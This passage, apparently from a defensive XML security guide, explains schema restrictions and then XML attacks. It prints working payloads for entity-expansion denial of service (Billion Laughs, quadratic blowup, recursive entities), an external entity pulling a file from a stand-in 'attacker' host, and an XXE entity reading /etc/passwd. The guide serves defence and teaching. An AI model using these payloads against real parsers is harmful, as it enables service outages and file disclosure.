    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
